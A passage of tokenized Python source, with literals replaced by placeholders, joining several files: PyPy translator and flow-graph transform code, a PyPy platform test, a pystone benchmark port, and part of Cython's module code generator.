writeline = True ) <EOL> for to_load , to_store in linkvars : <EOL> self . generator . load ( to_load ) <EOL> for to_load , to_store in reversed ( linkvars ) : <EOL> self . generator . store ( to_store ) <EOL> def _trace_enabled ( self ) : <EOL> return False <EOL> def _trace ( self , s ) : <EOL> raise NotImplementedError <EOL> def _trace_value ( self , prompt , v ) : <EOL> raise NotImplementedError <EOL> def _render_op ( self , op ) : <EOL> instr_list = self . db . genoo . opcodes . get ( op . opname , None ) <EOL> assert instr_list is not None , '<STR_LIT>' % op <EOL> assert isinstance ( instr_list , InstructionList ) <EOL> if self . _trace_enabled ( ) : <EOL> self . _trace ( str ( op ) , writeline = True ) <EOL> for i , arg in enumerate ( op . args ) : <EOL> self . _trace_value ( '<STR_LIT>' % i , arg ) <EOL> instr_list . render ( self . generator , op ) <EOL> if self . _trace_enabled ( ) : <EOL> self . 
_trace_value ( '<STR_LIT>' , op . result ) <EOL> def _get_block_name ( self , block ) : <EOL> return '<STR_LIT>' % self . blocknum [ block ] <EOL> def _set_locals ( self ) : <EOL> self . blocknum = { } <EOL> graph = self . graph <EOL> mix = [ graph . getreturnvar ( ) ] <EOL> for block in graph . iterblocks ( ) : <EOL> self . blocknum [ block ] = len ( self . blocknum ) <EOL> mix . extend ( block . inputargs ) <EOL> for op in block . operations : <EOL> mix . extend ( op . args ) <EOL> mix . append ( op . result ) <EOL> if getattr ( op , "<STR_LIT>" , None ) is not None : <EOL> cleanup_finally , cleanup_except = op . cleanup <EOL> for cleanupop in cleanup_finally + cleanup_except : <EOL> mix . extend ( cleanupop . args ) <EOL> mix . append ( cleanupop . result ) <EOL> for link in block . exits : <EOL> mix . extend ( link . getextravars ( ) ) <EOL> mix . extend ( link . args ) <EOL> args = { } <EOL> for ctstype , name in self . args : <EOL> args [ name ] = True <EOL> locals = [ ] <EOL> seen = { } <EOL> for v in mix : <EOL> is_var = isinstance ( v , flowmodel . Variable ) <EOL> if id ( v ) not in seen and is_var and v . name not in args and v . concretetype is not ootype . Void : <EOL> locals . append ( self . cts . llvar_to_cts ( v ) ) <EOL> seen [ id ( v ) ] = True <EOL> self . locals = locals <EOL> def _set_args ( self ) : <EOL> args = [ arg for arg in self . graph . getargs ( ) if arg . concretetype is not ootype . Void ] <EOL> self . args = map ( self . cts . llvar_to_cts , args ) <EOL> self . argset = set ( [ argname for argtype , argname in self . args ] ) </s>
<s> from pypy . translator . platform . test . test_platform import TestPlatform as BasicTest <EOL> from pypy . translator . platform . distutils_platform import DistutilsPlatform <EOL> import py <EOL> class TestDistutils ( BasicTest ) : <EOL> platform = DistutilsPlatform ( ) <EOL> def test_nice_errors ( self ) : <EOL> py . test . skip ( "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> LOOPS = <NUM_LIT> <EOL> class G ( object ) : pass <EOL> g = G ( ) <EOL> import sys <EOL> from time import clock <EOL> __version__ = "<STR_LIT>" <EOL> [ Ident1 , Ident2 , Ident3 , Ident4 , Ident5 ] = range ( <NUM_LIT:1> , <NUM_LIT:6> ) <EOL> class Record ( object ) : <EOL> def __init__ ( self , PtrComp = None , Discr = <NUM_LIT:0> , EnumComp = <NUM_LIT:0> , <EOL> IntComp = <NUM_LIT:0> , StringComp = "<STR_LIT>" ) : <EOL> self . PtrComp = PtrComp <EOL> self . Discr = Discr <EOL> self . EnumComp = EnumComp <EOL> self . IntComp = IntComp <EOL> self . StringComp = StringComp <EOL> def copy ( self ) : <EOL> return Record ( self . PtrComp , self . Discr , self . EnumComp , <EOL> self . IntComp , self . StringComp ) <EOL> TRUE = <NUM_LIT:1> <EOL> FALSE = <NUM_LIT:0> <EOL> def main ( loops = LOOPS ) : <EOL> benchtime , stones = pystones ( abs ( loops ) ) <EOL> if loops >= <NUM_LIT:0> : <EOL> print "<STR_LIT>" % ( __version__ , loops , benchtime ) <EOL> print "<STR_LIT>" % stones <EOL> def pystones ( loops = LOOPS ) : <EOL> return Proc0 ( loops ) <EOL> g . IntGlob = <NUM_LIT:0> <EOL> g . BoolGlob = FALSE <EOL> g . Char1Glob = '<STR_LIT>' <EOL> g . Char2Glob = '<STR_LIT>' <EOL> g . Array1Glob = [ <NUM_LIT:0> ] * <NUM_LIT> <EOL> g . Array2Glob = map ( lambda x : x [ : ] , [ g . Array1Glob ] * <NUM_LIT> ) <EOL> g . PtrGlb = None <EOL> g . PtrGlbNext = None <EOL> def Proc0 ( loops = LOOPS ) : <EOL> starttime = clock ( ) <EOL> i = <NUM_LIT:0> <EOL> while i < loops : <EOL> i += <NUM_LIT:1> <EOL> nulltime = clock ( ) - starttime <EOL> g . PtrGlbNext = Record ( ) <EOL> g . PtrGlb = Record ( ) <EOL> g . PtrGlb . PtrComp = g . PtrGlbNext <EOL> g . PtrGlb . Discr = Ident1 <EOL> g . PtrGlb . EnumComp = Ident3 <EOL> g . PtrGlb . IntComp = <NUM_LIT> <EOL> g . PtrGlb . StringComp = "<STR_LIT>" <EOL> String1Loc = "<STR_LIT>" <EOL> g . 
Array2Glob [ <NUM_LIT:8> ] [ <NUM_LIT:7> ] = <NUM_LIT:10> <EOL> EnumLoc = None <EOL> starttime = clock ( ) <EOL> i = <NUM_LIT:0> <EOL> while i < loops : <EOL> Proc5 ( ) <EOL> Proc4 ( ) <EOL> IntLoc1 = <NUM_LIT:2> <EOL> IntLoc2 = <NUM_LIT:3> <EOL> String2Loc = "<STR_LIT>" <EOL> EnumLoc = Ident2 <EOL> g . BoolGlob = not Func2 ( String1Loc , String2Loc ) <EOL> while IntLoc1 < IntLoc2 : <EOL> IntLoc3 = <NUM_LIT:5> * IntLoc1 - IntLoc2 <EOL> IntLoc3 = Proc7 ( IntLoc1 , IntLoc2 ) <EOL> IntLoc1 = IntLoc1 + <NUM_LIT:1> <EOL> Proc8 ( g . Array1Glob , g . Array2Glob , IntLoc1 , IntLoc3 ) <EOL> g . PtrGlb = Proc1 ( g . PtrGlb ) <EOL> CharIndex = '<STR_LIT:A>' <EOL> while CharIndex <= g . Char2Glob : <EOL> if EnumLoc == Func1 ( CharIndex , '<STR_LIT:C>' ) : <EOL> EnumLoc = Proc6 ( Ident1 ) <EOL> CharIndex = chr ( ord ( CharIndex ) + <NUM_LIT:1> ) <EOL> IntLoc3 = IntLoc2 * IntLoc1 <EOL> IntLoc2 = IntLoc3 / IntLoc1 <EOL> IntLoc2 = <NUM_LIT:7> * ( IntLoc3 - IntLoc2 ) - IntLoc1 <EOL> IntLoc1 = Proc2 ( IntLoc1 ) <EOL> i += <NUM_LIT:1> <EOL> benchtime = clock ( ) - starttime - nulltime <EOL> if benchtime < <NUM_LIT> : <EOL> benchtime = <NUM_LIT> <EOL> return benchtime , ( loops / benchtime ) <EOL> def Proc1 ( PtrParIn ) : <EOL> PtrParIn . PtrComp = NextRecord = g . PtrGlb . copy ( ) <EOL> PtrParIn . IntComp = <NUM_LIT:5> <EOL> NextRecord . IntComp = PtrParIn . IntComp <EOL> NextRecord . PtrComp = PtrParIn . PtrComp <EOL> NextRecord . PtrComp = Proc3 ( NextRecord . PtrComp ) <EOL> if NextRecord . Discr == Ident1 : <EOL> NextRecord . IntComp = <NUM_LIT:6> <EOL> NextRecord . EnumComp = Proc6 ( PtrParIn . EnumComp ) <EOL> NextRecord . PtrComp = g . PtrGlb . PtrComp <EOL> NextRecord . IntComp = Proc7 ( NextRecord . IntComp , <NUM_LIT:10> ) <EOL> else : <EOL> PtrParIn = NextRecord . copy ( ) <EOL> NextRecord . PtrComp = None <EOL> return PtrParIn <EOL> def Proc2 ( IntParIO ) : <EOL> IntLoc = IntParIO + <NUM_LIT:10> <EOL> EnumLoc = None <EOL> while <NUM_LIT:1> : <EOL> if g . 
Char1Glob == '<STR_LIT:A>' : <EOL> IntLoc = IntLoc - <NUM_LIT:1> <EOL> IntParIO = IntLoc - g . IntGlob <EOL> EnumLoc = Ident1 <EOL> if EnumLoc == Ident1 : <EOL> break <EOL> return IntParIO <EOL> def Proc3 ( PtrParOut ) : <EOL> if g . PtrGlb is not None : <EOL> PtrParOut = g . PtrGlb . PtrComp <EOL> else : <EOL> g . IntGlob = <NUM_LIT:100> <EOL> g . PtrGlb . IntComp = Proc7 ( <NUM_LIT:10> , g . IntGlob ) <EOL> return PtrParOut <EOL> def Proc4 ( ) : <EOL> BoolLoc = g . Char1Glob == '<STR_LIT:A>' <EOL> BoolLoc = BoolLoc or g . BoolGlob <EOL> g . Char2Glob = '<STR_LIT:B>' <EOL> def Proc5 ( ) : <EOL> g . Char1Glob = '<STR_LIT:A>' <EOL> g . BoolGlob = FALSE <EOL> def Proc6 ( EnumParIn ) : <EOL> EnumParOut = EnumParIn <EOL> if not Func3 ( EnumParIn ) : <EOL> EnumParOut = Ident4 <EOL> if EnumParIn == Ident1 : <EOL> EnumParOut = Ident1 <EOL> elif EnumParIn == Ident2 : <EOL> if g . IntGlob > <NUM_LIT:100> : <EOL> EnumParOut = Ident1 <EOL> else : <EOL> EnumParOut = Ident4 <EOL> elif EnumParIn == Ident3 : <EOL> EnumParOut = Ident2 <EOL> elif EnumParIn == Ident4 : <EOL> pass <EOL> elif EnumParIn == Ident5 : <EOL> EnumParOut = Ident3 <EOL> return EnumParOut <EOL> def Proc7 ( IntParI1 , IntParI2 ) : <EOL> IntLoc = IntParI1 + <NUM_LIT:2> <EOL> IntParOut = IntParI2 + IntLoc <EOL> return IntParOut <EOL> def Proc8 ( Array1Par , Array2Par , IntParI1 , IntParI2 ) : <EOL> IntLoc = IntParI1 + <NUM_LIT:5> <EOL> Array1Par [ IntLoc ] = IntParI2 <EOL> Array1Par [ IntLoc + <NUM_LIT:1> ] = Array1Par [ IntLoc ] <EOL> Array1Par [ IntLoc + <NUM_LIT:30> ] = IntLoc <EOL> for IntIndex in range ( IntLoc , IntLoc + <NUM_LIT:2> ) : <EOL> Array2Par [ IntLoc ] [ IntIndex ] = IntLoc <EOL> Array2Par [ IntLoc ] [ IntLoc - <NUM_LIT:1> ] = Array2Par [ IntLoc ] [ IntLoc - <NUM_LIT:1> ] + <NUM_LIT:1> <EOL> Array2Par [ IntLoc + <NUM_LIT:20> ] [ IntLoc ] = Array1Par [ IntLoc ] <EOL> g . 
IntGlob = <NUM_LIT:5> <EOL> def Func1 ( CharPar1 , CharPar2 ) : <EOL> CharLoc1 = CharPar1 <EOL> CharLoc2 = CharLoc1 <EOL> if CharLoc2 != CharPar2 : <EOL> return Ident1 <EOL> else : <EOL> return Ident2 <EOL> def Func2 ( StrParI1 , StrParI2 ) : <EOL> IntLoc = <NUM_LIT:1> <EOL> while IntLoc <= <NUM_LIT:1> : <EOL> if Func1 ( StrParI1 [ IntLoc ] , StrParI2 [ IntLoc + <NUM_LIT:1> ] ) == Ident1 : <EOL> CharLoc = '<STR_LIT:A>' <EOL> IntLoc = IntLoc + <NUM_LIT:1> <EOL> if CharLoc >= '<STR_LIT>' and CharLoc <= '<STR_LIT>' : <EOL> IntLoc = <NUM_LIT:7> <EOL> if CharLoc == '<STR_LIT:X>' : <EOL> return TRUE <EOL> else : <EOL> if StrParI1 > StrParI2 : <EOL> IntLoc = IntLoc + <NUM_LIT:7> <EOL> return TRUE <EOL> else : <EOL> return FALSE <EOL> def Func3 ( EnumParIn ) : <EOL> EnumLoc = EnumParIn <EOL> if EnumLoc == Ident3 : return TRUE <EOL> return FALSE <EOL> def error ( msg ) : <EOL> print >> sys . stderr , msg , <EOL> print >> sys . stderr , "<STR_LIT>" % sys . argv [ <NUM_LIT:0> ] <EOL> sys . exit ( <NUM_LIT:100> ) <EOL> def entrypoint ( loops = None ) : <EOL> import string <EOL> print string . replace ( "<STR_LIT>" , "<STR_LIT:s>" , "<STR_LIT:x>" ) <EOL> if loops is None : <EOL> loops = LOOPS <EOL> nargs = len ( sys . argv ) - <NUM_LIT:1> <EOL> if nargs > <NUM_LIT:1> : <EOL> error ( "<STR_LIT>" % nargs ) <EOL> elif nargs == <NUM_LIT:1> : <EOL> try : loops = int ( sys . argv [ <NUM_LIT:1> ] ) <EOL> except ValueError : <EOL> error ( "<STR_LIT>" % sys . argv [ <NUM_LIT:1> ] ) <EOL> else : <EOL> if hasattr ( sys , '<STR_LIT>' ) : <EOL> loops = LOOPS / <NUM_LIT> <EOL> main ( loops ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> entrypoint ( ) </s>
<s> from pypy . objspace . flow . model import * <EOL> def copyvar ( annotator , v ) : <EOL> """<STR_LIT>""" <EOL> assert isinstance ( v , Variable ) <EOL> newvar = Variable ( v ) <EOL> if annotator is not None and v in annotator . bindings : <EOL> annotator . transfer_binding ( newvar , v ) <EOL> if hasattr ( v , '<STR_LIT>' ) : <EOL> newvar . concretetype = v . concretetype <EOL> return newvar <EOL> def varoftype ( concretetype , name = None ) : <EOL> var = Variable ( name ) <EOL> var . concretetype = concretetype <EOL> return var <EOL> def insert_empty_block ( annotator , link , newops = [ ] ) : <EOL> """<STR_LIT>""" <EOL> vars = { } <EOL> for v in link . args : <EOL> if isinstance ( v , Variable ) : <EOL> vars [ v ] = True <EOL> for op in newops : <EOL> for v in op . args : <EOL> if isinstance ( v , Variable ) : <EOL> vars . setdefault ( v , True ) <EOL> vars [ op . result ] = False <EOL> vars = [ v for v , keep in vars . items ( ) if keep ] <EOL> mapping = { } <EOL> for v in vars : <EOL> mapping [ v ] = copyvar ( annotator , v ) <EOL> newblock = Block ( vars ) <EOL> newblock . operations . extend ( newops ) <EOL> newblock . closeblock ( Link ( link . args , link . target ) ) <EOL> newblock . renamevariables ( mapping ) <EOL> link . args [ : ] = vars <EOL> link . target = newblock <EOL> return newblock <EOL> def insert_empty_startblock ( annotator , graph ) : <EOL> vars = [ copyvar ( annotator , v ) for v in graph . startblock . inputargs ] <EOL> newblock = Block ( vars ) <EOL> newblock . closeblock ( Link ( vars , graph . startblock ) ) <EOL> graph . startblock . isstartblock = False <EOL> graph . startblock = newblock <EOL> graph . startblock . isstartblock = True <EOL> def starts_with_empty_block ( graph ) : <EOL> return ( not graph . startblock . operations <EOL> and graph . startblock . exitswitch is None <EOL> and graph . startblock . exits [ <NUM_LIT:0> ] . args == graph . 
getargs ( ) ) <EOL> def split_block ( annotator , block , index , _forcelink = None ) : <EOL> """<STR_LIT>""" <EOL> assert <NUM_LIT:0> <= index <= len ( block . operations ) <EOL> if block . exitswitch == c_last_exception : <EOL> assert index < len ( block . operations ) <EOL> varmap = { } <EOL> vars_produced_in_new_block = { } <EOL> def get_new_name ( var ) : <EOL> if var is None : <EOL> return None <EOL> if isinstance ( var , Constant ) : <EOL> return var <EOL> if var in vars_produced_in_new_block : <EOL> return var <EOL> if var not in varmap : <EOL> varmap [ var ] = copyvar ( annotator , var ) <EOL> return varmap [ var ] <EOL> moved_operations = block . operations [ index : ] <EOL> new_moved_ops = [ ] <EOL> for op in moved_operations : <EOL> newop = SpaceOperation ( op . opname , <EOL> [ get_new_name ( arg ) for arg in op . args ] , <EOL> op . result ) <EOL> new_moved_ops . append ( newop ) <EOL> vars_produced_in_new_block [ op . result ] = True <EOL> moved_operations = new_moved_ops <EOL> links = block . exits <EOL> block . exits = None <EOL> for link in links : <EOL> for i , arg in enumerate ( link . args ) : <EOL> if link . args [ i ] not in [ link . last_exception , link . last_exc_value ] : <EOL> link . args [ i ] = get_new_name ( link . args [ i ] ) <EOL> exitswitch = get_new_name ( block . exitswitch ) <EOL> if _forcelink is not None : <EOL> assert index == <NUM_LIT:0> <EOL> linkargs = list ( _forcelink ) <EOL> else : <EOL> linkargs = varmap . keys ( ) <EOL> newblock = Block ( [ get_new_name ( v ) for v in linkargs ] ) <EOL> newblock . operations = moved_operations <EOL> newblock . recloseblock ( * links ) <EOL> newblock . exitswitch = exitswitch <EOL> link = Link ( linkargs , newblock ) <EOL> block . operations = block . operations [ : index ] <EOL> block . recloseblock ( link ) <EOL> block . 
exitswitch = None <EOL> return link <EOL> def split_block_at_start ( annotator , block ) : <EOL> return split_block ( annotator , block , <NUM_LIT:0> , _forcelink = block . inputargs ) <EOL> def remove_direct_loops ( annotator , graph ) : <EOL> """<STR_LIT>""" <EOL> def visit ( link ) : <EOL> if isinstance ( link , Link ) and link . prevblock is link . target : <EOL> insert_empty_block ( annotator , link ) <EOL> traverse ( visit , graph ) <EOL> def remove_double_links ( annotator , graph ) : <EOL> """<STR_LIT>""" <EOL> def visit ( block ) : <EOL> if isinstance ( block , Block ) : <EOL> double_links = [ ] <EOL> seen = { } <EOL> for link in block . exits : <EOL> if link . target in seen : <EOL> double_links . append ( link ) <EOL> seen [ link . target ] = True <EOL> for link in double_links : <EOL> insert_empty_block ( annotator , link ) <EOL> traverse ( visit , graph ) <EOL> def no_links_to_startblock ( graph ) : <EOL> """<STR_LIT>""" <EOL> links_to_start_block = False <EOL> for block in graph . iterblocks ( ) : <EOL> for link in block . exits : <EOL> if link . target == graph . startblock : <EOL> links_to_start_block = True <EOL> break <EOL> if links_to_start_block : <EOL> insert_empty_startblock ( None , graph ) <EOL> def call_final_function ( translator , final_func , annhelper = None ) : <EOL> """<STR_LIT>""" <EOL> from pypy . annotation import model as annmodel <EOL> from pypy . rpython . lltypesystem import lltype <EOL> from pypy . rpython . annlowlevel import MixLevelHelperAnnotator <EOL> own_annhelper = ( annhelper is None ) <EOL> if own_annhelper : <EOL> annhelper = MixLevelHelperAnnotator ( translator . rtyper ) <EOL> c_final_func = annhelper . constfunc ( final_func , [ ] , annmodel . s_None ) <EOL> if own_annhelper : <EOL> annhelper . finish ( ) <EOL> entry_point = translator . graphs [ <NUM_LIT:0> ] <EOL> v = copyvar ( translator . annotator , entry_point . getreturnvar ( ) ) <EOL> extrablock = Block ( [ v ] ) <EOL> v_none = varoftype ( lltype . 
Void ) <EOL> newop = SpaceOperation ( '<STR_LIT>' , [ c_final_func ] , v_none ) <EOL> extrablock . operations = [ newop ] <EOL> extrablock . closeblock ( Link ( [ v ] , entry_point . returnblock ) ) <EOL> for block in entry_point . iterblocks ( ) : <EOL> if block is not extrablock : <EOL> for link in block . exits : <EOL> if link . target is entry_point . returnblock : <EOL> link . target = extrablock <EOL> checkgraph ( entry_point ) </s>
<s> import os , time <EOL> from PyrexTypes import CPtrType <EOL> import Future <EOL> try : <EOL> set <EOL> except NameError : <EOL> from sets import Set as set <EOL> import Annotate <EOL> import Code <EOL> import Naming <EOL> import Nodes <EOL> import Options <EOL> import PyrexTypes <EOL> import TypeSlots <EOL> import Version <EOL> from Errors import error , warning <EOL> from PyrexTypes import py_object_type <EOL> from Cython . Utils import open_new_file , replace_suffix , UtilityCode <EOL> from StringEncoding import escape_byte_string , EncodedString <EOL> def check_c_declarations ( module_node ) : <EOL> module_node . scope . check_c_classes ( ) <EOL> module_node . scope . check_c_functions ( ) <EOL> return module_node <EOL> class ModuleNode ( Nodes . Node , Nodes . BlockNode ) : <EOL> child_attrs = [ "<STR_LIT:body>" ] <EOL> directives = None <EOL> def analyse_declarations ( self , env ) : <EOL> if Options . embed_pos_in_docstring : <EOL> env . doc = EncodedString ( u'<STR_LIT>' % Nodes . relative_position ( self . pos ) ) <EOL> if not self . doc is None : <EOL> env . doc = EncodedString ( env . doc + u'<STR_LIT:\n>' + self . doc ) <EOL> env . doc . encoding = self . doc . encoding <EOL> else : <EOL> env . doc = self . doc <EOL> env . directives = self . directives <EOL> self . body . analyse_declarations ( env ) <EOL> def process_implementation ( self , options , result ) : <EOL> env = self . scope <EOL> env . return_type = PyrexTypes . c_void_type <EOL> self . referenced_modules = [ ] <EOL> self . find_referenced_modules ( env , self . referenced_modules , { } ) <EOL> if self . has_imported_c_functions ( ) : <EOL> self . module_temp_cname = env . allocate_temp_pyobject ( ) <EOL> env . release_temp ( self . module_temp_cname ) <EOL> if options . recursive : <EOL> self . generate_dep_file ( env , result ) <EOL> self . generate_c_code ( env , options , result ) <EOL> self . generate_h_code ( env , options , result ) <EOL> self . 
generate_api_code ( env , result ) <EOL> def has_imported_c_functions ( self ) : <EOL> for module in self . referenced_modules : <EOL> for entry in module . cfunc_entries : <EOL> if entry . defined_in_pxd : <EOL> return <NUM_LIT:1> <EOL> return <NUM_LIT:0> <EOL> def generate_dep_file ( self , env , result ) : <EOL> modules = self . referenced_modules <EOL> if len ( modules ) > <NUM_LIT:1> or env . included_files : <EOL> dep_file = replace_suffix ( result . c_file , "<STR_LIT>" ) <EOL> f = open ( dep_file , "<STR_LIT:w>" ) <EOL> try : <EOL> for module in modules : <EOL> if module is not env : <EOL> f . write ( "<STR_LIT>" % module . qualified_name ) <EOL> for path in module . included_files : <EOL> f . write ( "<STR_LIT>" % path ) <EOL> finally : <EOL> f . close ( ) <EOL> def generate_h_code ( self , env , options , result ) : <EOL> def h_entries ( entries , pxd = <NUM_LIT:0> ) : <EOL> return [ entry for entry in entries <EOL> if entry . visibility == '<STR_LIT>' or pxd and entry . defined_in_pxd ] <EOL> h_types = h_entries ( env . type_entries ) <EOL> h_vars = h_entries ( env . var_entries ) <EOL> h_funcs = h_entries ( env . cfunc_entries ) <EOL> h_extension_types = h_entries ( env . c_class_entries ) <EOL> if h_types or h_vars or h_funcs or h_extension_types : <EOL> result . h_file = replace_suffix ( result . c_file , "<STR_LIT>" ) <EOL> h_code = Code . CCodeWriter ( ) <EOL> if options . generate_pxi : <EOL> result . i_file = replace_suffix ( result . c_file , "<STR_LIT>" ) <EOL> i_code = Code . PyrexCodeWriter ( result . i_file ) <EOL> else : <EOL> i_code = None <EOL> guard = Naming . h_guard_prefix + env . qualified_name . replace ( "<STR_LIT:.>" , "<STR_LIT>" ) <EOL> h_code . put_h_guard ( guard ) <EOL> self . generate_extern_c_macro_definition ( h_code ) <EOL> self . generate_type_header_code ( h_types , h_code ) <EOL> h_code . putln ( "<STR_LIT>" ) <EOL> h_code . putln ( "<STR_LIT>" % Naming . api_guard_prefix + self . 
api_name ( env ) ) <EOL> if h_vars : <EOL> h_code . putln ( "<STR_LIT>" ) <EOL> for entry in h_vars : <EOL> self . generate_public_declaration ( entry , h_code , i_code ) <EOL> if h_funcs : <EOL> h_code . putln ( "<STR_LIT>" ) <EOL> for entry in h_funcs : <EOL> self . generate_public_declaration ( entry , h_code , i_code ) <EOL> if h_extension_types : <EOL> h_code . putln ( "<STR_LIT>" ) <EOL> for entry in h_extension_types : <EOL> self . generate_cclass_header_code ( entry . type , h_code ) <EOL> if i_code : <EOL> self . generate_cclass_include_code ( entry . type , i_code ) <EOL> h_code . putln ( "<STR_LIT>" ) <EOL> h_code . putln ( "<STR_LIT>" ) <EOL> h_code . putln ( "<STR_LIT>" ) <EOL> h_code . putln ( "<STR_LIT>" % env . module_name ) <EOL> h_code . putln ( "<STR_LIT>" ) <EOL> h_code . putln ( "<STR_LIT>" ) <EOL> h_code . copyto ( open_new_file ( result . h_file ) ) <EOL> def generate_public_declaration ( self , entry , h_code , i_code ) : <EOL> h_code . putln ( "<STR_LIT>" % ( <EOL> Naming . extern_c_macro , <EOL> entry . type . declaration_code ( <EOL> entry . cname , dll_linkage = "<STR_LIT>" ) ) ) <EOL> if i_code : <EOL> i_code . putln ( "<STR_LIT>" % <EOL> entry . type . declaration_code ( entry . cname , pyrex = <NUM_LIT:1> ) ) <EOL> def api_name ( self , env ) : <EOL> return env . qualified_name . replace ( "<STR_LIT:.>" , "<STR_LIT>" ) <EOL> def generate_api_code ( self , env , result ) : <EOL> api_funcs = [ ] <EOL> public_extension_types = [ ] <EOL> has_api_extension_types = <NUM_LIT:0> <EOL> for entry in env . cfunc_entries : <EOL> if entry . api : <EOL> api_funcs . append ( entry ) <EOL> for entry in env . c_class_entries : <EOL> if entry . visibility == '<STR_LIT>' : <EOL> public_extension_types . append ( entry ) <EOL> if entry . api : <EOL> has_api_extension_types = <NUM_LIT:1> <EOL> if api_funcs or has_api_extension_types : <EOL> result . api_file = replace_suffix ( result . c_file , "<STR_LIT>" ) <EOL> h_code = Code . 
CCodeWriter ( ) <EOL> name = self . api_name ( env ) <EOL> guard = Naming . api_guard_prefix + name <EOL> h_code . put_h_guard ( guard ) <EOL> h_code . putln ( '<STR_LIT>' ) <EOL> if result . h_file : <EOL> h_code . putln ( '<STR_LIT>' % os . path . basename ( result . h_file ) ) <EOL> for entry in public_extension_types : <EOL> type = entry . type <EOL> h_code . putln ( "<STR_LIT>" ) <EOL> h_code . putln ( "<STR_LIT>" % type . typeptr_cname ) <EOL> h_code . putln ( "<STR_LIT>" % ( <EOL> type . typeobj_cname , type . typeptr_cname ) ) <EOL> if api_funcs : <EOL> h_code . putln ( "<STR_LIT>" ) <EOL> for entry in api_funcs : <EOL> type = CPtrType ( entry . type ) <EOL> h_code . putln ( "<STR_LIT>" % type . declaration_code ( entry . cname ) ) <EOL> h_code . putln ( "<STR_LIT>" ) <EOL> h_code . put_h_guard ( Naming . api_func_guard + "<STR_LIT>" ) <EOL> h_code . put ( import_module_utility_code . impl ) <EOL> h_code . putln ( "<STR_LIT>" ) <EOL> h_code . putln ( "<STR_LIT>" ) <EOL> if api_funcs : <EOL> h_code . putln ( "<STR_LIT>" ) <EOL> h_code . put ( function_import_utility_code . impl ) <EOL> if public_extension_types : <EOL> h_code . putln ( "<STR_LIT>" ) <EOL> h_code . put ( type_import_utility_code . impl ) <EOL> h_code . putln ( "<STR_LIT>" ) <EOL> h_code . putln ( "<STR_LIT>" % name ) <EOL> h_code . putln ( "<STR_LIT>" ) <EOL> h_code . putln ( '<STR_LIT>' % env . qualified_name ) <EOL> h_code . putln ( "<STR_LIT>" ) <EOL> for entry in api_funcs : <EOL> sig = entry . type . signature_string ( ) <EOL> h_code . putln ( <EOL> '<STR_LIT>' % ( <EOL> entry . name , <EOL> entry . cname , <EOL> sig ) ) <EOL> h_code . putln ( "<STR_LIT>" ) <EOL> for entry in public_extension_types : <EOL> self . generate_type_import_call ( <EOL> entry . type , h_code , <EOL> "<STR_LIT>" % entry . type . typeptr_cname ) <EOL> h_code . putln ( "<STR_LIT>" ) <EOL> h_code . putln ( "<STR_LIT>" ) <EOL> h_code . putln ( "<STR_LIT>" ) <EOL> h_code . putln ( "<STR_LIT>" ) <EOL> h_code . 
putln ( "<STR_LIT:}>" ) <EOL> h_code . putln ( "<STR_LIT>" ) <EOL> h_code . putln ( "<STR_LIT>" ) <EOL> h_code . copyto ( open_new_file ( result . api_file ) ) <EOL> def generate_cclass_header_code ( self , type , h_code ) : <EOL> h_code . putln ( "<STR_LIT>" % ( <EOL> Naming . extern_c_macro , <EOL> type . typeobj_cname ) ) <EOL> def generate_cclass_include_code ( self , type , i_code ) : <EOL> i_code . putln ( "<STR_LIT>" % ( <EOL> type . module_name , type . name ) ) <EOL> i_code . indent ( ) <EOL> var_entries = type . scope . var_entries <EOL> if var_entries : <EOL> for entry in var_entries : <EOL> i_code . putln ( "<STR_LIT>" % <EOL> entry . type . declaration_code ( entry . cname , pyrex = <NUM_LIT:1> ) ) <EOL> else : <EOL> i_code . putln ( "<STR_LIT>" ) <EOL> i_code . dedent ( ) <EOL> def generate_c_code ( self , env , options , result ) : <EOL> modules = self . referenced_modules <EOL> if Options . annotate or options . annotate : <EOL> code = Annotate . AnnotationCCodeWriter ( ) <EOL> else : <EOL> code = Code . CCodeWriter ( emit_linenums = options . emit_linenums ) <EOL> h_code = code . insertion_point ( ) <EOL> self . generate_module_preamble ( env , modules , h_code ) <EOL> code . globalstate . module_pos = self . pos <EOL> code . globalstate . directives = self . directives <EOL> code . putln ( "<STR_LIT>" ) <EOL> code . putln ( "<STR_LIT>" % env . qualified_name ) <EOL> self . generate_const_definitions ( env , code ) <EOL> self . generate_interned_num_decls ( env , code ) <EOL> self . generate_interned_string_decls ( env , code ) <EOL> self . generate_py_string_decls ( env , code ) <EOL> code . globalstate . insert_global_var_declarations_into ( code ) <EOL> self . generate_cached_builtins_decls ( env , code ) <EOL> self . body . generate_function_definitions ( env , code ) <EOL> code . mark_pos ( None ) <EOL> self . generate_typeobj_definitions ( env , code ) <EOL> self . generate_method_table ( env , code ) <EOL> self . 
generate_filename_init_prototype ( code ) <EOL> if env . has_import_star : <EOL> self . generate_import_star ( env , code ) <EOL> self . generate_pymoduledef_struct ( env , code ) <EOL> self . generate_module_init_func ( modules [ : - <NUM_LIT:1> ] , env , code ) <EOL> code . mark_pos ( None ) <EOL> self . generate_module_cleanup_func ( env , code ) <EOL> self . generate_filename_table ( code ) <EOL> self . generate_utility_functions ( env , code , h_code ) <EOL> self . generate_declarations_for_modules ( env , modules , h_code ) <EOL> h_code . write ( '<STR_LIT:\n>' ) <EOL> code . globalstate . close_global_decls ( ) <EOL> f = open_new_file ( result . c_file ) <EOL> code . copyto ( f ) <EOL> f . close ( ) <EOL> result . c_file_generated = <NUM_LIT:1> <EOL> if Options . annotate or options . annotate : <EOL> self . annotate ( code ) <EOL> code . save_annotation ( result . main_source_file , result . c_file ) <EOL> def find_referenced_modules ( self , env , module_list , modules_seen ) : <EOL> if env not in modules_seen : <EOL> modules_seen [ env ] = <NUM_LIT:1> <EOL> for imported_module in env . cimported_modules : <EOL> self . find_referenced_modules ( imported_module , module_list , modules_seen ) <EOL> module_list . append ( env ) <EOL> def sort_types_by_inheritance ( self , type_dict , getkey ) : <EOL> type_items = type_dict . items ( ) <EOL> type_list = [ ] <EOL> for i , item in enumerate ( type_items ) : <EOL> key , new_entry = item <EOL> hierarchy = set ( ) <EOL> base = new_entry <EOL> while base : <EOL> base_type = base . type . base_type <EOL> if not base_type : <EOL> break <EOL> base_key = getkey ( base_type ) <EOL> hierarchy . add ( base_key ) <EOL> base = type_dict . get ( base_key ) <EOL> new_entry . base_keys = hierarchy <EOL> for j in range ( i ) : <EOL> entry = type_list [ j ] <EOL> if key in entry . base_keys : <EOL> type_list . insert ( j , new_entry ) <EOL> break <EOL> else : <EOL> type_list . 
